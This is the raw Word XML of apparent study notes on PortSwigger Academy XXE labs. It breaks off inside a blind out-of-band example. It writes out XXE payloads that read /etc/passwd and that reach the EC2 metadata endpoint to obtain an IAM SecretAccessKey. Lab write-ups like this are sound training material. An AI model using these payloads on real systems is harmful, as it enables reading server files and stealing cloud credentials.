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98A367" w14:textId="355E56D4" w:rsidR="001E336A" w:rsidRDefault="001E336A" w:rsidP="00B1101F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B1101F">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>PortSwigger</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B1101F">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> XXE Injection Lab Notes </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="638FBACC" w14:textId="77777777" w:rsidR="00B1101F" w:rsidRPr="00B1101F" w:rsidRDefault="00B1101F" w:rsidP="00B1101F">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B1101F">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>XXE (XML External Entity) is a vulnerability that happens when an application parses XML input insecurely and allows external entities to be loaded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BFE0080" w14:textId="77777777" w:rsidR="00B1101F" w:rsidRPr="00B1101F" w:rsidRDefault="00B1101F" w:rsidP="00B1101F">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B1101F">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>An attacker can exploit this to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A65E08D" w14:textId="77777777" w:rsidR="00B1101F" w:rsidRPr="00B1101F" w:rsidRDefault="00B1101F" w:rsidP="00B1101F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B1101F">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Read local files on the server (/etc/passwd, config files).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="316467F3" w14:textId="77777777" w:rsidR="00B1101F" w:rsidRPr="00B1101F" w:rsidRDefault="00B1101F" w:rsidP="00B1101F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B1101F">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Perform SSRF (make the server send requests to internal systems).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F4B050" w14:textId="77777777" w:rsidR="00B1101F" w:rsidRPr="00B1101F" w:rsidRDefault="00B1101F" w:rsidP="00B1101F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B1101F">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>In some cases, cause denial of service or exfiltrate sensitive data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D1CE181" w14:textId="77777777" w:rsidR="00B1101F" w:rsidRPr="00B1101F" w:rsidRDefault="00B1101F" w:rsidP="00B1101F">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B1101F">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>👉</w:t>
      </w:r>
      <w:r w:rsidRPr="00B1101F">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> In short: XXE lets attackers abuse XML parsers to access files or systems the app shouldn’t expose.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0315A9ED" w14:textId="77777777" w:rsidR="00B1101F" w:rsidRPr="00B1101F" w:rsidRDefault="00B1101F" w:rsidP="00B1101F"/>
    <w:p w14:paraId="5B8D7A82" w14:textId="4B2F78FF" w:rsidR="001E336A" w:rsidRPr="00B1101F" w:rsidRDefault="001E336A" w:rsidP="001E336A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B1101F">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Exploiting XXE using external entities to retrieve files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="373C46DA" w14:textId="77777777" w:rsidR="001E336A" w:rsidRPr="001E336A" w:rsidRDefault="001E336A" w:rsidP="001E336A">
      <w:r w:rsidRPr="001E336A">
        <w:t>This lab has a "Check stock" feature that parses XML input and returns any unexpected values in the response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E76EDCB" w14:textId="77777777" w:rsidR="001E336A" w:rsidRPr="001E336A" w:rsidRDefault="001E336A" w:rsidP="001E336A">
      <w:r w:rsidRPr="001E336A">
        <w:t>To solve the lab, inject an XML external entity to retrieve the contents of the /etc/passwd file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C1D0F97" w14:textId="77777777" w:rsidR="001E336A" w:rsidRPr="00B1101F" w:rsidRDefault="001E336A" w:rsidP="001E336A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B1101F">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t> Solution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31EC1495" w14:textId="77777777" w:rsidR="001E336A" w:rsidRPr="001E336A" w:rsidRDefault="001E336A" w:rsidP="001E336A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001E336A">
        <w:t>Visit a product page, click "Check stock", and intercept the resulting POST request in Burp Suite.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48DE745E" w14:textId="77777777" w:rsidR="001E336A" w:rsidRPr="001E336A" w:rsidRDefault="001E336A" w:rsidP="001E336A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001E336A">
        <w:t>Insert the following external entity definition in between the XML declaration and the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001E336A">
        <w:t>stockCheck</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001E336A">
        <w:t> element:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="192304A1" w14:textId="77777777" w:rsidR="001E336A" w:rsidRDefault="001E336A" w:rsidP="001E336A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B1101F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;!DOCTYPE test [ &lt;!ENTITY </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B1101F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>xxe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B1101F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> SYSTEM "file:///etc/passwd"</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B1101F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>&gt; ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1101F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A1661F7" w14:textId="167808EF" w:rsidR="00B1101F" w:rsidRPr="00B1101F" w:rsidRDefault="00B1101F" w:rsidP="001E336A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="15FB7F2F" wp14:editId="510B1E8B">
            <wp:extent cx="4102100" cy="2767097"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="182279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94352" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId5"/>
                    <a:srcRect l="19180" t="19400" r="24934" b="13580"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4107857" cy="2770981"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="28CF2548" w14:textId="1ACC6F87" w:rsidR="00F901C8" w:rsidRPr="00B1101F" w:rsidRDefault="001E336A" w:rsidP="00B1101F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001E336A">
        <w:t>Replace the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001E336A">
        <w:t>productId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001E336A">
        <w:t> number with a reference to the external entity: &amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001E336A">
        <w:t>xxe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001E336A">
        <w:t>;.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001E336A">
        <w:t xml:space="preserve"> The response should contain "Invalid product ID:" followed by the contents of the /etc/passwd file</w:t>
      </w:r>
      <w:r w:rsidR="00B1101F">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E668F44" w14:textId="1653D2AA" w:rsidR="001E336A" w:rsidRPr="00B1101F" w:rsidRDefault="001E336A" w:rsidP="00B1101F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B1101F">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Exploiting XXE to perform SSRF attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72830DC7" w14:textId="77777777" w:rsidR="001E336A" w:rsidRPr="001E336A" w:rsidRDefault="001E336A" w:rsidP="001E336A">
      <w:r w:rsidRPr="001E336A">
        <w:t>This lab has a "Check stock" feature that parses XML input and returns any unexpected values in the response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B48B1F" w14:textId="77777777" w:rsidR="001E336A" w:rsidRPr="001E336A" w:rsidRDefault="001E336A" w:rsidP="001E336A">
      <w:r w:rsidRPr="001E336A">
        <w:t>The lab server is running a (simulated) EC2 metadata endpoint at the default URL, which is http://169.254.169.254/. This endpoint can be used to retrieve data about the instance, some of which might be sensitive.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3149F99B" w14:textId="77777777" w:rsidR="001E336A" w:rsidRPr="001E336A" w:rsidRDefault="001E336A" w:rsidP="001E336A">
      <w:r w:rsidRPr="001E336A">
        <w:t>To solve the lab, exploit the XXE vulnerability to perform an SSRF attack that obtains the server's IAM secret access key from the EC2 metadata endpoint.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686B6FD9" w14:textId="77777777" w:rsidR="001E336A" w:rsidRPr="00B1101F" w:rsidRDefault="001E336A" w:rsidP="001E336A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B1101F">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t> Solution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CAEB603" w14:textId="77777777" w:rsidR="001E336A" w:rsidRPr="001E336A" w:rsidRDefault="001E336A" w:rsidP="001E336A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001E336A">
        <w:t>Visit a product page, click "Check stock", and intercept the resulting POST request in Burp Suite.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55899DA8" w14:textId="77777777" w:rsidR="001E336A" w:rsidRPr="001E336A" w:rsidRDefault="001E336A" w:rsidP="001E336A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001E336A">
        <w:t>Insert the following external entity definition in between the XML declaration and the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001E336A">
        <w:t>stockCheck</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001E336A">
        <w:t> element:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B720695" w14:textId="77777777" w:rsidR="001E336A" w:rsidRPr="00B1101F" w:rsidRDefault="001E336A" w:rsidP="001E336A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B1101F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;!DOCTYPE test [ &lt;!ENTITY </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B1101F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>xxe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B1101F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> SYSTEM "http://169.254.169.254/"</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B1101F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>&gt; ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1101F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00733FB9" w14:textId="77777777" w:rsidR="001E336A" w:rsidRPr="001E336A" w:rsidRDefault="001E336A" w:rsidP="001E336A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001E336A">
        <w:t>Replace the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001E336A">
        <w:t>productId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001E336A">
        <w:t> number with a reference to the external entity: &amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001E336A">
        <w:t>xxe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001E336A">
        <w:t>;.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001E336A">
        <w:t xml:space="preserve"> The response should contain "Invalid product ID:" followed by the response from the metadata endpoint, which will initially be a folder name.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60605B85" w14:textId="77777777" w:rsidR="001E336A" w:rsidRPr="00B1101F" w:rsidRDefault="001E336A" w:rsidP="001E336A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001E336A">
        <w:t>Iteratively update the URL in the DTD to explore the API until you reach </w:t>
      </w:r>
      <w:r w:rsidRPr="00B1101F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>/latest/meta-data/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B1101F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>iam</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B1101F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>/security-credentials/admin.</w:t>
      </w:r>
      <w:r w:rsidRPr="001E336A">
        <w:t xml:space="preserve"> This should return JSON containing the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B1101F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>SecretAccessKey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B1101F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25769640" w14:textId="79ED67AC" w:rsidR="00B1101F" w:rsidRPr="001E336A" w:rsidRDefault="00B1101F" w:rsidP="00B1101F">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="23AF3729" wp14:editId="0731473E">
            <wp:extent cx="4238241" cy="2520950"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4911348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34800" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId6"/>
                    <a:srcRect l="22487" t="20184" r="22289" b="21419"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4241549" cy="2522918"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="317E7923" w14:textId="77777777" w:rsidR="001E336A" w:rsidRDefault="001E336A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13E80BA3" w14:textId="4EBE2A45" w:rsidR="001E336A" w:rsidRPr="00B1101F" w:rsidRDefault="001E336A" w:rsidP="001E336A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B1101F">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Blind XXE with out-of-band interaction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58140393" w14:textId="77777777" w:rsidR="001E336A" w:rsidRPr="001E336A" w:rsidRDefault="001E336A" w:rsidP="001E336A">
      <w:r w:rsidRPr="001E336A">
        <w:t>This lab has a "Check stock" feature that parses XML input but does not display the result.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12DA0D73" w14:textId="77777777" w:rsidR="001E336A" w:rsidRPr="001E336A" w:rsidRDefault="001E336A" w:rsidP="001E336A">
      <w:r w:rsidRPr="001E336A">
        <w:t>You can detect the blind XXE vulnerability by triggering out-of-band interactions with an external domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5242AF98" w14:textId="77777777" w:rsidR="001E336A" w:rsidRPr="001E336A" w:rsidRDefault="001E336A" w:rsidP="001E336A">
      <w:r w:rsidRPr="001E336A">
        <w:lastRenderedPageBreak/>
        <w:t>To solve the lab, use an external entity to make the XML parser issue a DNS lookup and HTTP request to Burp Collaborator.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63574A9C" w14:textId="77777777" w:rsidR="001E336A" w:rsidRPr="001E336A" w:rsidRDefault="001E336A" w:rsidP="001E336A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E336A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Note</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D62E32" w14:textId="77777777" w:rsidR="001E336A" w:rsidRPr="001E336A" w:rsidRDefault="001E336A" w:rsidP="001E336A">
      <w:r w:rsidRPr="001E336A">
        <w:t>To prevent the Academy platform being used to attack third parties, our firewall blocks interactions between the labs and arbitrary external systems. To solve the lab, you must use Burp Collaborator's default public server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A444ED" w14:textId="77777777" w:rsidR="001E336A" w:rsidRPr="00B1101F" w:rsidRDefault="001E336A" w:rsidP="001E336A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B1101F">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t> Solution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF51204" w14:textId="77777777" w:rsidR="001E336A" w:rsidRPr="001E336A" w:rsidRDefault="001E336A" w:rsidP="001E336A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001E336A">
        <w:t>Visit a product page, click "Check stock" and intercept the resulting POST request in Burp Suite Professional.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C0ECBC" w14:textId="77777777" w:rsidR="001E336A" w:rsidRPr="001E336A" w:rsidRDefault="001E336A" w:rsidP="001E336A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001E336A">
        <w:t>Insert the following external entity definition in between the XML declaration and the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001E336A">
        <w:t>stockCheck</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001E336A">
        <w:t> element. Right-click and select "Insert Collaborator payload" to insert a Burp Collaborator subdomain where indicated:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7446B47F" w14:textId="77777777" w:rsidR="001E336A" w:rsidRPr="00B1101F" w:rsidRDefault="001E336A" w:rsidP="001E336A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B1101F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;!DOCTYPE </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B1101F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>stockCheck</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B1101F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> [ &lt;!ENTITY </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B1101F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
